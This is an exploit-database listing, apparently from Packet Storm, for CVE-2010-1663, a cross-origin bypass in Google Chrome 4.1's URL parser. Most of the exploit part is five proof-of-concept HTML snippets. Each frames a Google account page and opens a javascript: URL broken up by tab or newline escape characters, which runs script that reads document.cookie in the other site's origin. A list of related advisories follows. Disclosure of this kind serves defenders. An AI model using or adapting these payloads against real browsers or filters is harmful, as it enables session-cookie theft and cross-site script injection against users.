Lucene search
Jordi ChancelPACKETSTORM:89715HistoryMay 20, 2010 - 12:00 a.m.
Google Chrome 4.1.249.1059 Cross Origin Bypass
2010-05-2000:00:00
Jordi Chancel
packetstormsecurity.com
19
EPSS
0.549
Percentile
97.7%
`# Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
#
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
#
# Author: Jordi Chancel
#
# Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html
#
# Description: {
# The Google URL Parsing Library (aka google-url or GURL) in Google Chrome
# before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy
# via CHARACTER TABULATION or others escape characters inside javascript: protocol string. }
#
# Some PoC :
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>
Greetz : Xylitol , Eddy Bordi , 599eme Man , Gnouf , CTZ .
`
Related
cve
cve
CVE-2010-1663
2010-05-03 13:51:53
exploitpack
exploitpack
Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)
2010-05-19 00:00:00
prion
prion
Design/Logic Flaw
2010-05-03 13:51:00
seebug
seebug
Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)
2014-07-01 00:00:00
Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
2010-05-20 00:00:00
ubuntucve
ubuntucve
CVE-2010-1663
2010-05-03 00:00:00
debiancve
debiancve
CVE-2010-1663
2010-05-03 13:51:00
cvelist
cvelist
CVE-2010-1663
2010-04-30 17:00:00
exploitdb
exploitdb
Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)
2010-05-19 00:00:00
zdt
zdt
Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
2010-05-19 00:00:00
checkpoint_advisories
checkpoint_advisories
Google Chrome GURL Cross Origin Bypass (CVE-2010-1663)
2010-06-09 00:00:00
nvd
nvd
CVE-2010-1663
2010-05-03 13:51:53
openvas
openvas
Google Chrome Multiple Vulnerabilities Windows - May10
2010-05-07 00:00:00
Google Chrome Multiple Vulnerabilities Windows (May 2010)
2010-05-07 00:00:00
nessus
nessus
Google Chrome < 4.1.249.1064 Multiple Vulnerabilities
2010-04-28 00:00:00